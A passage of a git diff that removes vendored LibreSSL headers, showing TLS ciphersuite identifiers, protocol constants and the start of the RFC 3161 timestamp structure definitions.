-#define TLS1_CK_ECDH_ECDSA_WITH_NULL_SHA                0x0300C001
-#define TLS1_CK_ECDH_ECDSA_WITH_RC4_128_SHA             0x0300C002
-#define TLS1_CK_ECDH_ECDSA_WITH_DES_192_CBC3_SHA        0x0300C003
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_CBC_SHA         0x0300C004
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_CBC_SHA         0x0300C005
-
-#define TLS1_CK_ECDHE_ECDSA_WITH_NULL_SHA               0x0300C006
-#define TLS1_CK_ECDHE_ECDSA_WITH_RC4_128_SHA            0x0300C007
-#define TLS1_CK_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA       0x0300C008
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_CBC_SHA        0x0300C009
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_CBC_SHA        0x0300C00A
-
-#define TLS1_CK_ECDH_RSA_WITH_NULL_SHA                  0x0300C00B
-#define TLS1_CK_ECDH_RSA_WITH_RC4_128_SHA               0x0300C00C
-#define TLS1_CK_ECDH_RSA_WITH_DES_192_CBC3_SHA          0x0300C00D
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_CBC_SHA           0x0300C00E
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_CBC_SHA           0x0300C00F
-
-#define TLS1_CK_ECDHE_RSA_WITH_NULL_SHA                 0x0300C010
-#define TLS1_CK_ECDHE_RSA_WITH_RC4_128_SHA              0x0300C011
-#define TLS1_CK_ECDHE_RSA_WITH_DES_192_CBC3_SHA         0x0300C012
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA          0x0300C013
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA          0x0300C014
-
-#define TLS1_CK_ECDH_anon_WITH_NULL_SHA                 0x0300C015
-#define TLS1_CK_ECDH_anon_WITH_RC4_128_SHA              0x0300C016
-#define TLS1_CK_ECDH_anon_WITH_DES_192_CBC3_SHA         0x0300C017
-#define TLS1_CK_ECDH_anon_WITH_AES_128_CBC_SHA          0x0300C018
-#define TLS1_CK_ECDH_anon_WITH_AES_256_CBC_SHA          0x0300C019
-
-/* SRP ciphersuites from RFC 5054. */
-#define TLS1_CK_SRP_SHA_WITH_3DES_EDE_CBC_SHA		0x0300C01A
-#define TLS1_CK_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA	0x0300C01B
-#define TLS1_CK_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA	0x0300C01C
-#define TLS1_CK_SRP_SHA_WITH_AES_128_CBC_SHA		0x0300C01D
-#define TLS1_CK_SRP_SHA_RSA_WITH_AES_128_CBC_SHA	0x0300C01E
-#define TLS1_CK_SRP_SHA_DSS_WITH_AES_128_CBC_SHA	0x0300C01F
-#define TLS1_CK_SRP_SHA_WITH_AES_256_CBC_SHA		0x0300C020
-#define TLS1_CK_SRP_SHA_RSA_WITH_AES_256_CBC_SHA	0x0300C021
-#define TLS1_CK_SRP_SHA_DSS_WITH_AES_256_CBC_SHA	0x0300C022
-
-/* ECDH HMAC based ciphersuites from RFC 5289. */
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_SHA256         0x0300C023
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_SHA384         0x0300C024
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_SHA256          0x0300C025
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_SHA384          0x0300C026
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_SHA256           0x0300C027
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_SHA384           0x0300C028
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_SHA256            0x0300C029
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_SHA384            0x0300C02A
-
-/* ECDH GCM based ciphersuites from RFC 5289. */
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256	0x0300C02B
-#define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384	0x0300C02C
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_128_GCM_SHA256      0x0300C02D
-#define TLS1_CK_ECDH_ECDSA_WITH_AES_256_GCM_SHA384      0x0300C02E
-#define TLS1_CK_ECDHE_RSA_WITH_AES_128_GCM_SHA256       0x0300C02F
-#define TLS1_CK_ECDHE_RSA_WITH_AES_256_GCM_SHA384       0x0300C030
-#define TLS1_CK_ECDH_RSA_WITH_AES_128_GCM_SHA256        0x0300C031
-#define TLS1_CK_ECDH_RSA_WITH_AES_256_GCM_SHA384        0x0300C032
-
-/* ChaCha20-Poly1305 based ciphersuites. */
-#define TLS1_CK_ECDHE_RSA_CHACHA20_POLY1305		0x0300CCA8
-#define TLS1_CK_ECDHE_ECDSA_CHACHA20_POLY1305		0x0300CCA9
-#define TLS1_CK_DHE_RSA_CHACHA20_POLY1305		0x0300CCAA
-
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_MD5		"EXP1024-RC4-MD5"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5	"EXP1024-RC2-CBC-MD5"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_DES_CBC_SHA	"EXP1024-DES-CBC-SHA"
-#define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA	"EXP1024-DHE-DSS-DES-CBC-SHA"
-#define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_SHA		"EXP1024-RC4-SHA"
-#define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA	"EXP1024-DHE-DSS-RC4-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_RC4_128_SHA		"DHE-DSS-RC4-SHA"
-
-/* AES ciphersuites from RFC 3268. */
-#define TLS1_TXT_RSA_WITH_AES_128_SHA			"AES128-SHA"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_SHA		"DH-DSS-AES128-SHA"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_SHA		"DH-RSA-AES128-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA		"DHE-DSS-AES128-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA		"DHE-RSA-AES128-SHA"
-#define TLS1_TXT_ADH_WITH_AES_128_SHA			"ADH-AES128-SHA"
-
-#define TLS1_TXT_RSA_WITH_AES_256_SHA			"AES256-SHA"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_SHA		"DH-DSS-AES256-SHA"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_SHA		"DH-RSA-AES256-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA		"DHE-DSS-AES256-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA		"DHE-RSA-AES256-SHA"
-#define TLS1_TXT_ADH_WITH_AES_256_SHA			"ADH-AES256-SHA"
-
-/* ECC ciphersuites from draft-ietf-tls-ecc-01.txt (Mar 15, 2001) */
-#define TLS1_TXT_ECDH_ECDSA_WITH_NULL_SHA               "ECDH-ECDSA-NULL-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_RC4_128_SHA            "ECDH-ECDSA-RC4-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_DES_192_CBC3_SHA       "ECDH-ECDSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_CBC_SHA        "ECDH-ECDSA-AES128-SHA"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_CBC_SHA        "ECDH-ECDSA-AES256-SHA"
-
-#define TLS1_TXT_ECDHE_ECDSA_WITH_NULL_SHA              "ECDHE-ECDSA-NULL-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_RC4_128_SHA           "ECDHE-ECDSA-RC4-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA      "ECDHE-ECDSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_CBC_SHA       "ECDHE-ECDSA-AES128-SHA"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_CBC_SHA       "ECDHE-ECDSA-AES256-SHA"
-
-#define TLS1_TXT_ECDH_RSA_WITH_NULL_SHA                 "ECDH-RSA-NULL-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_RC4_128_SHA              "ECDH-RSA-RC4-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_DES_192_CBC3_SHA         "ECDH-RSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_CBC_SHA          "ECDH-RSA-AES128-SHA"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_CBC_SHA          "ECDH-RSA-AES256-SHA"
-
-#define TLS1_TXT_ECDHE_RSA_WITH_NULL_SHA                "ECDHE-RSA-NULL-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_RC4_128_SHA             "ECDHE-RSA-RC4-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_DES_192_CBC3_SHA        "ECDHE-RSA-DES-CBC3-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_CBC_SHA         "ECDHE-RSA-AES128-SHA"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_CBC_SHA         "ECDHE-RSA-AES256-SHA"
-
-#define TLS1_TXT_ECDH_anon_WITH_NULL_SHA                "AECDH-NULL-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_RC4_128_SHA             "AECDH-RC4-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_DES_192_CBC3_SHA        "AECDH-DES-CBC3-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_AES_128_CBC_SHA         "AECDH-AES128-SHA"
-#define TLS1_TXT_ECDH_anon_WITH_AES_256_CBC_SHA         "AECDH-AES256-SHA"
-
-/* PSK ciphersuites from RFC 4279. */
-#define TLS1_TXT_PSK_WITH_RC4_128_SHA			"PSK-RC4-SHA"
-#define TLS1_TXT_PSK_WITH_3DES_EDE_CBC_SHA		"PSK-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_PSK_WITH_AES_128_CBC_SHA		"PSK-AES128-CBC-SHA"
-#define TLS1_TXT_PSK_WITH_AES_256_CBC_SHA		"PSK-AES256-CBC-SHA"
-
-/* SRP ciphersuite from RFC 5054. */
-#define TLS1_TXT_SRP_SHA_WITH_3DES_EDE_CBC_SHA		"SRP-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA	"SRP-RSA-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA	"SRP-DSS-3DES-EDE-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_WITH_AES_128_CBC_SHA		"SRP-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_AES_128_CBC_SHA	"SRP-RSA-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_AES_128_CBC_SHA	"SRP-DSS-AES-128-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_WITH_AES_256_CBC_SHA		"SRP-AES-256-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_RSA_WITH_AES_256_CBC_SHA	"SRP-RSA-AES-256-CBC-SHA"
-#define TLS1_TXT_SRP_SHA_DSS_WITH_AES_256_CBC_SHA	"SRP-DSS-AES-256-CBC-SHA"
-
-/* Camellia ciphersuites from RFC 4132. */
-#define TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA		"CAMELLIA128-SHA"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA	"DH-DSS-CAMELLIA128-SHA"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA	"DH-RSA-CAMELLIA128-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA	"DHE-DSS-CAMELLIA128-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA	"DHE-RSA-CAMELLIA128-SHA"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA		"ADH-CAMELLIA128-SHA"
-
-#define TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA		"CAMELLIA256-SHA"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA	"DH-DSS-CAMELLIA256-SHA"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA	"DH-RSA-CAMELLIA256-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA	"DHE-DSS-CAMELLIA256-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA	"DHE-RSA-CAMELLIA256-SHA"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA		"ADH-CAMELLIA256-SHA"
-
-/* TLS 1.2 Camellia SHA-256 ciphersuites from RFC5932 */
-#define TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA256	"CAMELLIA128-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256	"DH-DSS-CAMELLIA128-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256	"DH-RSA-CAMELLIA128-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256	"DHE-DSS-CAMELLIA128-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256	"DHE-RSA-CAMELLIA128-SHA256"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA256	"ADH-CAMELLIA128-SHA256"
-
-#define TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA256	"CAMELLIA256-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256	"DH-DSS-CAMELLIA256-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256	"DH-RSA-CAMELLIA256-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256	"DHE-DSS-CAMELLIA256-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256	"DHE-RSA-CAMELLIA256-SHA256"
-#define TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA256	"ADH-CAMELLIA256-SHA256"
-
-/* SEED ciphersuites from RFC 4162. */
-#define TLS1_TXT_RSA_WITH_SEED_SHA                      "SEED-SHA"
-#define TLS1_TXT_DH_DSS_WITH_SEED_SHA                   "DH-DSS-SEED-SHA"
-#define TLS1_TXT_DH_RSA_WITH_SEED_SHA                   "DH-RSA-SEED-SHA"
-#define TLS1_TXT_DHE_DSS_WITH_SEED_SHA                  "DHE-DSS-SEED-SHA"
-#define TLS1_TXT_DHE_RSA_WITH_SEED_SHA                  "DHE-RSA-SEED-SHA"
-#define TLS1_TXT_ADH_WITH_SEED_SHA                      "ADH-SEED-SHA"
-
-/* TLS v1.2 ciphersuites. */
-#define TLS1_TXT_RSA_WITH_NULL_SHA256			"NULL-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_128_SHA256		"AES128-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_256_SHA256		"AES256-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_SHA256		"DH-DSS-AES128-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_SHA256		"DH-RSA-AES128-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA256		"DHE-DSS-AES128-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA256		"DHE-RSA-AES128-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_SHA256		"DH-DSS-AES256-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_SHA256		"DH-RSA-AES256-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA256		"DHE-DSS-AES256-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA256		"DHE-RSA-AES256-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_128_SHA256		"ADH-AES128-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_256_SHA256		"ADH-AES256-SHA256"
-
-/* TLS v1.2 GCM ciphersuites from RFC 5288. */
-#define TLS1_TXT_RSA_WITH_AES_128_GCM_SHA256		"AES128-GCM-SHA256"
-#define TLS1_TXT_RSA_WITH_AES_256_GCM_SHA384		"AES256-GCM-SHA384"
-#define TLS1_TXT_DHE_RSA_WITH_AES_128_GCM_SHA256	"DHE-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_DHE_RSA_WITH_AES_256_GCM_SHA384	"DHE-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_DH_RSA_WITH_AES_128_GCM_SHA256		"DH-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_DH_RSA_WITH_AES_256_GCM_SHA384		"DH-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_DHE_DSS_WITH_AES_128_GCM_SHA256	"DHE-DSS-AES128-GCM-SHA256"
-#define TLS1_TXT_DHE_DSS_WITH_AES_256_GCM_SHA384	"DHE-DSS-AES256-GCM-SHA384"
-#define TLS1_TXT_DH_DSS_WITH_AES_128_GCM_SHA256		"DH-DSS-AES128-GCM-SHA256"
-#define TLS1_TXT_DH_DSS_WITH_AES_256_GCM_SHA384		"DH-DSS-AES256-GCM-SHA384"
-#define TLS1_TXT_ADH_WITH_AES_128_GCM_SHA256		"ADH-AES128-GCM-SHA256"
-#define TLS1_TXT_ADH_WITH_AES_256_GCM_SHA384		"ADH-AES256-GCM-SHA384"
-
-/* ECDH HMAC based ciphersuites from RFC 5289. */
-
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_SHA256    "ECDHE-ECDSA-AES128-SHA256"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_SHA384    "ECDHE-ECDSA-AES256-SHA384"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_SHA256     "ECDH-ECDSA-AES128-SHA256"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_SHA384     "ECDH-ECDSA-AES256-SHA384"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_SHA256      "ECDHE-RSA-AES128-SHA256"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_SHA384      "ECDHE-RSA-AES256-SHA384"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_SHA256       "ECDH-RSA-AES128-SHA256"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_SHA384       "ECDH-RSA-AES256-SHA384"
-
-/* ECDH GCM based ciphersuites from RFC 5289. */
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256    "ECDHE-ECDSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384    "ECDHE-ECDSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_GCM_SHA256     "ECDH-ECDSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_GCM_SHA384     "ECDH-ECDSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_128_GCM_SHA256      "ECDHE-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDHE_RSA_WITH_AES_256_GCM_SHA384      "ECDHE-RSA-AES256-GCM-SHA384"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_128_GCM_SHA256       "ECDH-RSA-AES128-GCM-SHA256"
-#define TLS1_TXT_ECDH_RSA_WITH_AES_256_GCM_SHA384       "ECDH-RSA-AES256-GCM-SHA384"
-
-/* ChaCha20-Poly1305 based ciphersuites. */
-#define TLS1_TXT_ECDHE_RSA_WITH_CHACHA20_POLY1305	"ECDHE-RSA-CHACHA20-POLY1305"
-#define TLS1_TXT_ECDHE_ECDSA_WITH_CHACHA20_POLY1305	"ECDHE-ECDSA-CHACHA20-POLY1305"
-#define TLS1_TXT_DHE_RSA_WITH_CHACHA20_POLY1305		"DHE-RSA-CHACHA20-POLY1305"
-
-#define TLS_CT_RSA_SIGN			1
-#define TLS_CT_DSS_SIGN			2
-#define TLS_CT_RSA_FIXED_DH		3
-#define TLS_CT_DSS_FIXED_DH		4
-#define TLS_CT_ECDSA_SIGN		64
-#define TLS_CT_RSA_FIXED_ECDH		65
-#define TLS_CT_ECDSA_FIXED_ECDH 	66
-#define TLS_CT_GOST94_SIGN		21
-#define TLS_CT_GOST01_SIGN		22
-#define TLS_CT_GOST12_256_SIGN		238 /* FIXME: IANA */
-#define TLS_CT_GOST12_512_SIGN		239 /* FIXME: IANA */
-/* when correcting this number, correct also SSL3_CT_NUMBER in ssl3.h (see
- * comment there) */
-#define TLS_CT_NUMBER			11
-
-#define TLS1_FINISH_MAC_LENGTH		12
-
-#define TLS_MD_MAX_CONST_SIZE			20
-#define TLS_MD_CLIENT_FINISH_CONST		"client finished"
-#define TLS_MD_CLIENT_FINISH_CONST_SIZE		15
-#define TLS_MD_SERVER_FINISH_CONST		"server finished"
-#define TLS_MD_SERVER_FINISH_CONST_SIZE		15
-#define TLS_MD_SERVER_WRITE_KEY_CONST		"server write key"
-#define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_KEY_EXPANSION_CONST		"key expansion"
-#define TLS_MD_KEY_EXPANSION_CONST_SIZE		13
-#define TLS_MD_CLIENT_WRITE_KEY_CONST		"client write key"
-#define TLS_MD_CLIENT_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_SERVER_WRITE_KEY_CONST		"server write key"
-#define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE	16
-#define TLS_MD_IV_BLOCK_CONST			"IV block"
-#define TLS_MD_IV_BLOCK_CONST_SIZE		8
-#define TLS_MD_MASTER_SECRET_CONST		"master secret"
-#define TLS_MD_MASTER_SECRET_CONST_SIZE		13
-
-/* TLS Session Ticket extension struct. */
-struct tls_session_ticket_ext_st {
-	unsigned short length;
-	void *data;
-};
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ts.h b/thirdparty/libressl/include/openssl/ts.h
deleted file mode 100644
index a8d2281..0000000
--- a/thirdparty/libressl/include/openssl/ts.h
+++ /dev/null
@@ -1,836 +0,0 @@
-/* $OpenBSD: ts.h,v 1.8 2016/12/27 16:05:57 jsing Exp $ */
-/* Written by Zoltan Glozik (zglozik@opentsa.org) for the OpenSSL
- * project 2002, 2003, 2004.
- */
-/* ====================================================================
- * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_TS_H
-#define HEADER_TS_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BUFFER
-#include <openssl/buffer.h>
-#endif
-#ifndef OPENSSL_NO_EVP
-#include <openssl/evp.h>
-#endif
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/asn1.h>
-#include <openssl/safestack.h>
-
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#include <openssl/x509.h>
-#include <openssl/x509v3.h>
-
-/*
-MessageImprint ::= SEQUENCE  {
-     hashAlgorithm                AlgorithmIdentifier,
-     hashedMessage                OCTET STRING  }
-*/
-
-typedef struct TS_msg_imprint_st {
-	X509_ALGOR *hash_algo;
-	ASN1_OCTET_STRING *hashed_msg;
-} TS_MSG_IMPRINT;
-
-/*
-TimeStampReq ::= SEQUENCE  {
-   version                  INTEGER  { v1(1) },
-   messageImprint           MessageImprint,
-     --a hash algorithm OID and the hash value of the data to be
-     --time-stamped
-   reqPolicy                TSAPolicyId                OPTIONAL,
-   nonce                    INTEGER                    OPTIONAL,
-   certReq                  BOOLEAN                    DEFAULT FALSE,
-   extensions               [0] IMPLICIT Extensions    OPTIONAL  }
-*/
-
-typedef struct TS_req_st {
-	ASN1_INTEGER *version;
-	TS_MSG_IMPRINT *msg_imprint;
-	ASN1_OBJECT *policy_id;		/* OPTIONAL */
-	ASN1_INTEGER *nonce;		/* OPTIONAL */
-	ASN1_BOOLEAN cert_req;		/* DEFAULT FALSE */
-	STACK_OF(X509_EXTENSION) *extensions;	/* [0] OPTIONAL */
-} TS_REQ;
-
-/*
-Accuracy ::= SEQUENCE {
-                seconds        INTEGER           OPTIONAL,
-                millis     [0] INTEGER  (1..999) OPTIONAL,
-                micros     [1] INTEGER  (1..999) OPTIONAL  }
-*/
-
-typedef struct TS_accuracy_st {
-	ASN1_INTEGER *seconds;
-	ASN1_INTEGER *millis;
-	ASN1_INTEGER *micros;
-} TS_ACCURACY;
-
-/*
-TSTInfo ::= SEQUENCE  {
-    version                      INTEGER  { v1(1) },
-    policy                       TSAPolicyId,
-    messageImprint               MessageImprint,
-      -- MUST have the same value as the similar field in
-      -- TimeStampReq
-    serialNumber                 INTEGER,
-     -- Time-Stamping users MUST be ready to accommodate integers
-     -- up to 160 bits.
-    genTime                      GeneralizedTime,
-    accuracy                     Accuracy                 OPTIONAL,
-    ordering                     BOOLEAN             DEFAULT FALSE,
-    nonce                        INTEGER                  OPTIONAL,
-      -- MUST be present if the similar field was present
-      -- in TimeStampReq.  In that case it MUST have the same value.
-    tsa                          [0] GeneralName          OPTIONAL,
-    extensions                   [1] IMPLICIT Extensions  OPTIONAL   }
-*/
-
-typedef struct TS_tst_info_st {
-	ASN1_INTEGER *version;
-	ASN1_OBJECT *policy_id;
-	TS_MSG_IMPRINT *msg_imprint;
-	ASN1_INTEGER *serial;
-	ASN1_GENERALIZEDTIME *time;
-	TS_ACCURACY *accuracy;
-	ASN1_BOOLEAN ordering;
-	ASN1_INTEGER *nonce;
-	GENERAL_NAME *tsa;
-	STACK_OF(X509_EXTENSION) *extensions;
-} TS_TST_INFO;
-
-/*
-PKIStatusInfo ::= SEQUENCE {
-    status        PKIStatus,
-    statusString  PKIFreeText     OPTIONAL,
-    failInfo      PKIFailureInfo  OPTIONAL  }
-
-From RFC 1510 - section 3.1.1:
-PKIFreeText ::= SEQUENCE SIZE (1..MAX) OF UTF8String
-	-- text encoded as UTF-8 String (note:  each UTF8String SHOULD
-	-- include an RFC 1766 language tag to indicate the language
-	-- of the contained text)
-*/
-
-/* Possible values for status. See ts_resp_print.c && ts_resp_verify.c. */
-
-#define	TS_STATUS_GRANTED			0
-#define	TS_STATUS_GRANTED_WITH_MODS		1
-#define	TS_STATUS_REJECTION			2
-#define	TS_STATUS_WAITING			3
-#define	TS_STATUS_REVOCATION_WARNING		4
-#define	TS_STATUS_REVOCATION_NOTIFICATION	5
-
-/* Possible values for failure_info. See ts_resp_print.c && ts_resp_verify.c */
-
-#define	TS_INFO_BAD_ALG			0
-#define	TS_INFO_BAD_REQUEST		2
-#define	TS_INFO_BAD_DATA_FORMAT		5
